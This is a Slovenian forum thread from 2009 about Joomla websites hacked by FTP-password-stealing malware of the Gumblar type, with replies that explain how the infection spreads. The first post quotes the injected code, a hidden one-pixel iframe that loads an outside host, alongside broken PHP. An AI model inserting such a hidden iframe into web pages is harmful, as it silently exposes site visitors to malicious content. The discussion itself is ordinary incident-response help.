Vdor v večje stevilo internetnih strani
 
perunpro 1. jul 2009 10:47:04 Pridružen od:
23. maj 2008
3360 objav
2892 217 19
#1

Pozdravljeni,



na parih spletnih straneh se je zgodil vdor in prosim za informacije in pomoc.



http://www.racunovodskiservis.info

http://www.anasan.si/

http://avtizem.info/

http://cnvos.info/

(avast mi ne pusti gor, Chrome pa javi Malware)

http://cnvos.si/



Najverjetneje se bo iskalo tudi nekoga, ki ve za kaj gre, da zadevo razcisti in pregleda. Mislim da se bo kmalu javil tudi clovek, ki ima cez te strani.



Zaenkrat pa iscem kakrsnekoli informacije o tej skripti:


<iframe src ="http://viewhit.biz" width=1 height=1 style="visibility:hidden">ho $database->_ticker . ' queries executed';

echo '<pre>';
foreach ($database->_log as $k=>$sql) {
echo $k+1 . "\n" . $sql . '<hr />';
}
echo '</pre>';
}

doGzip();

?>

Kaj dela ta skripta? Kako je prislo do vdora? Kraja FTP gesel ali kako drugace? Mislite da je prislo prov do vdora na streznik ponudnika? Je mozno da so podatki v bazi kontanimirani? Pri eniih javlja error, pri enih je samo prazna stran (+ izvorna koda), pri enih pa proba povezat na nek cuden pejdz...



Zanimivo je, da so zadeve na locenih streznikih, pri drugacnih ponudnikih gostovanja, razlicne verzije Joomle (1.0 in 1.5) - nekdo se je nacrtno spravil na Joomla related strani teh ljudi.


všeč(0) ni všeč(0) spam(0)
 
HeXeR 1. jul 2009 11:05:27 Pridružen od:
13. dec 2006
3268 objav
122 22 5
#2

Ta skripta, ki je del manjka ... izpiše iframe, s katerim nekdo skriva svoje sledi ali pa samo prodaja porn ... ali pa kej druga mogoče :)



se pa očitno tudi igra z podatkovno bazo ... težko ti napišem kaj točno, ker del kode kot sem že napisal manjka ...


všeč(0) ni všeč(0) spam(0)
First rule of business, protect your investment.
 
sce 1. jul 2009 11:28:22 Pridružen od:
27. maj 2007
995 objav
313 60 26
#3

Za začetek posodobite CMSe ki poganjajo te strani ;)


všeč(0) ni všeč(0) spam(0)
It's unknown, but I could be a cactus with two cats. I could also be an IT specialist. Who knows...
 
perunpro 1. jul 2009 11:29:07 Pridružen od:
23. maj 2008
3360 objav
2892 217 19
#4

Kater del kode manjka? :) To je vse kar sem dobil v vednost.



EDIT: sce, gre za Joomla strani in zaenkrat je treba odpraviti vdor, nato pa gledat naprej. Updejtat kontanimiran streznik se mi ne zdi ravno logicno.


všeč(0) ni všeč(0) spam(0)
 
Mika 1. jul 2009 11:31:03 Pridružen od:
22. apr 2007
4116 objav
2984 773 56
#5

Poglej tele teme:

http://www.internetmojster.com/administracija/gumblar-ftp-virus.html

http://www.internetmojster.com/administracija/nov-vdor-in-skodljiva-koda.html



Če strani ne bi bile na Joomli ali Wordpressu, bi normalno delovale, le nek iframe bi imele vstavljen. Na Joomli in Wordpressu pa se žal ob insertiranju kode izbriše še določen del php kode, ki jo vsebuje datoteka, zato stran ne dela. Upam, da imaš backupe, ker se je ta iframe nasral v vse datoteke z imenom "index".



Dobil si virus, ki ti je prebral vsa shranjena gesla za tvoj FTP program, ker si gesla shranil. Znano za Filezillo. Tako ti je nasral vse te strani. Oziroma krivec je tisti, ki je v FTP clientu imel shranjena gesla za dostop do serverja.


všeč(0) ni všeč(0) spam(0)
 
newbe 1. jul 2009 13:01:36 Pridružen od:
5. jun 2008
1596 objav
99 117 12
#6

hej



a smem vprašat malo vse ki ste ga dobili če ste uspeli ugotoviti od kod ste dobili ta virus?



tnx


všeč(0) ni všeč(0) spam(0)
*Uporabniku je bila prepovedana uporaba foruma zaradi ignoriranja pravil trgovanja*
 
perunpro 1. jul 2009 13:08:19 Pridružen od:
23. maj 2008
3360 objav
2892 217 19
#7

Mi se ugotavljamo. Oz. zadeva je taka, da so te strani od nasega poslovnega partnerja, za katerega smo delali mi custom page - tisto kar ni bilo smiselno narediti z Joomlo - na vseh ostalih pa se fura Joomla.



Mika, hvala za povezave, nisem pa mislil da je to to. Bom preveril kako je z backupi...


všeč(0) ni všeč(0) spam(0)
 
newbe 1. jul 2009 13:37:01 Pridružen od:
5. jun 2008
1596 objav
99 117 12
#8

ok perunpro, hvala vseeno, če zveš oz. če kdo ve bi pa prosil da deli, da se probamo ostali čimbolj izognit temu


všeč(0) ni všeč(0) spam(0)
*Uporabniku je bila prepovedana uporaba foruma zaradi ignoriranja pravil trgovanja*
 
theDegriz 1. jul 2009 13:58:14 Pridružen od:
25. mar 2007
1287 objav
1456 270 21
#9

@newbe ta (in podobni virusi) je v bistvu virus na računalniku, ki pobere dostopne podatke za FTP in potem nalepi Zloveščo(tm) kodo v konec php datotek.



Dela neodvisno od (ne)CMS-ja.



@Mika: ne gre samo za index datoteke. Ima pač en čuden ključ po katerem izbira datoteke.



Dela pa dosti CMS-jev tudi s tem ampak se pozna občutno pri nalagalnih časih tako, da opaziš tudi če nisi programer, da nekaj ne štima.


všeč(0) ni všeč(0) spam(0)
Consulting trenutno samo za obstojece projekte. V juliju naprej coaching.
 
newbe 1. jul 2009 14:30:45 Pridružen od:
5. jun 2008
1596 objav
99 117 12
#10

@theDegriz tega se zavedam, ampak na računalnik je moral nekako priti in po tem sprašujem, kje so ga staknili


všeč(0) ni všeč(0) spam(0)
*Uporabniku je bila prepovedana uporaba foruma zaradi ignoriranja pravil trgovanja*
 
 

🔒 Za odgovor na to temo se moraš prijaviti.

Prijavi se